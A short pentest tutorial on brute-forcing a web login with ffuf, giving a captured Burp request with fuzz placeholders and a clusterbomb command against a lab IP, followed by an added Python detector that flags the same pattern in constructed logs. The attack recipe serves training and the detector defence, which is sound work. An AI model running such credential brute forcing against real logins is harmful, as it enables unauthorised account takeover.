Use FFUF to Brute Force Login
Brute Force with a Request File
- Start Burp
- Submit a login attempt with random credentials on the target web page
- Copy the captured request, for example:
    POST /login HTTP/1.1
    Host: 10.10.10.10
    Content-Length: 37
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Content-Type: application/json
    Origin: http://10.10.10.10
    Referer: http://10.10.10.10/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close

    {"username":"admin","password":"admin"}
- Paste the contents into a file, for example request.txt
- Replace the username and password values with the placeholders USERFUZZ and PASSFUZZ
    POST /login HTTP/1.1
    Host: 10.10.10.10
    Content-Length: 37
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Content-Type: application/json
    Origin: http://10.10.10.10
    Referer: http://10.10.10.10/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close

    {"username":"USERFUZZ","password":"PASSFUZZ"}
- Save these contents to a file
- Run FFUF in clusterbomb mode to brute force the login

    ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200

    [Status: 200, Size: 2, Words: 1, Lines: 1]
    * USERFUZZ: admin
    * PASSFUZZ: password
In this example, we are doing the following:
- -request request.txt: the request template for FFUF to follow
- -request-proto http: the protocol to use with the raw request
- -mode clusterbomb: try every combination of the words from the given word lists
- -w /path/to/users/file.txt:USERFUZZ: insert the words from this word list in the "username":"USERFUZZ" placeholder
- -w /path/to/password/file.txt:PASSFUZZ: insert the words from this word list in the "password":"PASSFUZZ" placeholder
- -mc 200: match only responses with the HTTP 200 status code, which indicates a successful login here
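
The same run seen from the defending side, as an added example that is not part of the original page: because request.txt replays the captured browser headers, including the User-Agent, the traffic has to be recognised by its pattern (many failed logins from one source across several usernames) and by a 200 that follows such a burst. The log format, the source addresses 10.10.10.50 and 10.10.10.77, the thresholds and all function names are assumptions made for this sketch.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (assumption): "<ISO time> <src ip> POST /login user=<name> status=<code>"
LINE = re.compile(r"(\S+) (\S+) POST /login user=(\S+) status=(\d{3})")

def parse(lines):
    for line in lines:
        m = LINE.match(line)
        if m:
            ts, ip, user, status = m.groups()
            yield datetime.fromisoformat(ts), ip, user, int(status)

def detect(lines, window=timedelta(seconds=60), max_failures=8, min_users=2):
    """Flag sources whose failed logins within `window` span several usernames."""
    recent = defaultdict(list)  # source ip -> [(time, user)] for recent failures
    flagged, alerts = set(), []
    for ts, ip, user, status in parse(lines):
        fails = recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if status != 200:
            fails.append((ts, user))
            users = sorted({u for _, u in fails})
            if len(fails) >= max_failures and len(users) >= min_users and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, users))
        elif ip in flagged:
            # A 200 from a flagged source is the response "-mc 200" matches:
            # treat the account as compromised and reset its credentials.
            alerts.append(("success_after_bruteforce", ip, user))
    return alerts

def sample_log():
    """Constructed data: one user mistypes once; one source tries 3 users x 4 passwords."""
    t0, lines = datetime(2024, 5, 1, 10, 0, 0), []
    def add(sec, ip, user, status):
        lines.append(f"{(t0 + timedelta(seconds=sec)).isoformat()} {ip} POST /login user={user} status={status}")
    add(0, "10.10.10.77", "alice", 401)
    add(5, "10.10.10.77", "alice", 200)
    n = 10
    for pw in range(4):
        for user in ("admin", "root", "test"):
            add(n, "10.10.10.50", user, 200 if (user, pw) == ("admin", 3) else 401)
            n += 1
    return lines

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The single mistyped password from 10.10.10.77 raises nothing; the grid from 10.10.10.50 raises one alert at the eighth failure and a second when the matching pair returns 200.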